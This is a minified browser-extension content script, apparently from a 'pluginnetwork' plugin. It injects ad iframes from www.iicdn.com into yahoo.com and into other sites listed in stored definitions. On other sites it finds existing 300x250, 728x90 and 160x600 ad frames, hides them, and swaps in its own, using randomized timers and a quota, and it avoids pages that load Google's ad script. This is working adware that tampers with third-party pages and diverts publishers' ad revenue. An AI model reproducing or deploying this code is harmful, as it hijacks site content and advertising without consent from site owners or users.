if(!pluginnetwork)var pluginnetwork={};var failcount=0;
pluginnetwork.contentscript=function(){return{isMarketingEnabled:function(){var c=pluginnetwork.pluginStorage.getItem("profile"),c=pluginnetwork.pluginStorage.getItem("profile-"+c);return JSON.parse(c).settings.marketing?!0:!1},isFirstRunDaily:function(){var c=pluginnetwork.pluginStorage.getItem(pluginnetwork.GLOBALS.PLUGIN_NAMESPACE+".lastrun"),a=!1;typeof c=="undefined"&&(c=0);var b=new Date,b=b.getFullYear()+""+pluginnetwork.helpers.getMonthFormatted(b)+""+pluginnetwork.helpers.getDayFormatted(b);
parseInt(b)>parseInt(c)&&(a=!0);return a},createIframe:function(c,a,b,f){var e="";this.isFirstRunDaily()&&(e="&firstrun="+pluginnetwork.GLOBALS.PLUGIN_NAMESPACE);var d=document.createElement("iframe");d.setAttribute("src","http://www.iicdn.com/www/delivery/afr.php?zoneid="+a+"&refresh=60"+e);d.setAttribute("height",b);d.setAttribute("width",f);d.setAttribute("name",c);d.setAttribute("id",c);d.setAttribute("scrolling","NO");d.setAttribute("frameborder","0");return d},contentEdit:function(){var c={"www.yahoo.com":[{selector:"promobar-mid_bar",
append:!1,style:"",ielement:1},{selector:"#yn-story",append:!1,style:"",ielement:1},{selector:"#sidebar",append:!1,style:"",ielement:1},{selector:".ymh-browse-container:first-child",append:!1,style:"",ielement:1},{selector:"#y-col2",append:!1,style:"",ielement:1},{selector:"#y-footer",append:!1,style:"width:748px;margin:10px auto 0 auto;",ielement:2}]};for(b in document.getElementsByTagName("script"))if(typeof document.getElementsByTagName("script")[b].src!=="undefined"&&document.getElementsByTagName("script")[b].src.indexOf("pagead/show_ads.js")!==
-1)return;if(this.isMarketingEnabled())if(pluginnetwork.pluginStorage.getItem(pluginnetwork.GLOBALS.PLUGIN_NAMESPACE+".definitions")!==null&&pluginnetwork.helpers.IsJsonString(pluginnetwork.pluginStorage.getItem(pluginnetwork.GLOBALS.PLUGIN_NAMESPACE+".definitions"))&&(c=JSON.parse(pluginnetwork.pluginStorage.getItem(pluginnetwork.GLOBALS.PLUGIN_NAMESPACE+".definitions"))),c[window.location.host]!==void 0)for(b in swapDefinitions=c[window.location.host],swapDefinitions){node=document.querySelector(swapDefinitions[b].selector);
if(document.querySelector("#a47abb2d")!==null)break;if(document.querySelector("#a47abb3d")!==null)break;if(node){var a=document.createElement("div");a.id="__"+window.location.host+"_"+b;swapDefinitions[b].style.length>0&&a.setAttribute("style",swapDefinitions[b].style);swapDefinitions[b].ielement==1?a.appendChild(this.createIframe("a47abb2d",pluginnetwork.GLOBALS.AZ_300,250,300)):a.appendChild(this.createIframe("a47abb3d",pluginnetwork.GLOBALS.AZ_728,90,728));swapDefinitions[b].append?node.appendChild(a):
node.parentNode.insertBefore(a,node)}}else if(document.querySelector("#a47abb2d")===null&&document.querySelector("#a47abb3d")===null&&document.querySelector("#a47abb4d")===null&&typeof c.bl!="undefined"&&typeof c.global!="undefined"&&pluginnetwork.pluginStorage.getItem(pluginnetwork.GLOBALS.PLUGIN_NAMESPACE+".aq")!=null){swapDefinitions=c.global;for(b in swapDefinitions)if(node=document.querySelector(swapDefinitions[b].selector))a=document.createElement("div"),a.id="__"+window.location.host+"_"+b,
swapDefinitions[b].style.length>0&&a.setAttribute("style",swapDefinitions[b].style),swapDefinitions[b].ielement==1?a.appendChild(this.createIframe("a47abb2d",pluginnetwork.GLOBALS.AZ_300,250,300)):a.appendChild(this.createIframe("a47abb3d",pluginnetwork.GLOBALS.AZ_728,90,728)),swapDefinitions[b].append?node.appendChild(a):node.parentNode.insertBefore(a,node);for(var a=window.location.host.split(".").reverse(),b=0;b<c.bl.length;b++)if(c.bl[b].indexOf(a[1])!=-1)return;if(!(pluginnetwork.pluginStorage.getItem(pluginnetwork.GLOBALS.PLUGIN_NAMESPACE+
".tdb")==null&&(new Date).getMinutes()%2==0==!1)&&pluginnetwork.pluginStorage.getItem(pluginnetwork.GLOBALS.PLUGIN_NAMESPACE+".ei")!=null&&(a=pluginnetwork.pluginStorage.getItem(pluginnetwork.GLOBALS.PLUGIN_NAMESPACE+".ft"),a=a==null?Math.round((new Date).getTime()/1E3):parseInt(a),!(Math.round((new Date).getTime()/1E3)<a)&&(c=parseInt(pluginnetwork.pluginStorage.getItem(pluginnetwork.GLOBALS.PLUGIN_NAMESPACE+".aq")),a=!1,c>0))){if(document.querySelector('iframe[width="300"]')!==null&&(b=document.querySelector('iframe[width="300"]'),
b.height==250))a=document.createElement("div"),a.id="__"+window.location.host+"_aq",a.appendChild(this.createIframe("a47abb2d",pluginnetwork.GLOBALS.AZ_300,250,300)),b.parentNode.appendChild(a),b.style.display="none !important",c-=1,a=!0;if(document.querySelector('iframe[width="728"]')!==null&&(b=document.querySelector('iframe[width="728"]'),b.height==90))a=document.createElement("div"),a.id="__"+window.location.host+"_aq2",a.appendChild(this.createIframe("a47abb3d",pluginnetwork.GLOBALS.AZ_728,90,
728)),b.parentNode.appendChild(a),b.style.display="none !important",c-=1,a=!0;if(document.querySelector('iframe[width="160"]')!==null&&(b=document.querySelector('iframe[width="160"]'),b.height==600))a=document.createElement("div"),a.id="__"+window.location.host+"_aq3",a.appendChild(this.createIframe("a47abb4d",pluginnetwork.GLOBALS.AZ_160,600,160)),b.parentNode.appendChild(a),b.style.display="none !important",c-=1,a=!0;a==!0&&(a=Math.round((new Date).getTime()/1E3)+Math.floor(Math.random()*180+300),
c<0&&(c=0),pluginnetwork.pluginStorage.setItem(pluginnetwork.GLOBALS.PLUGIN_NAMESPACE+".aq",c),pluginnetwork.pluginStorage.setItem(pluginnetwork.GLOBALS.PLUGIN_NAMESPACE+".ft",a))}}},init:function(){typeof pluginnetwork.pluginStorage!="undefined"?window===window.top&&pluginnetwork.contentscript.contentEdit():(failcount+=1,failcount<20&&setTimeout(pluginnetwork.contentscript.init,100))}}}();setTimeout(pluginnetwork.contentscript.init,1E3);
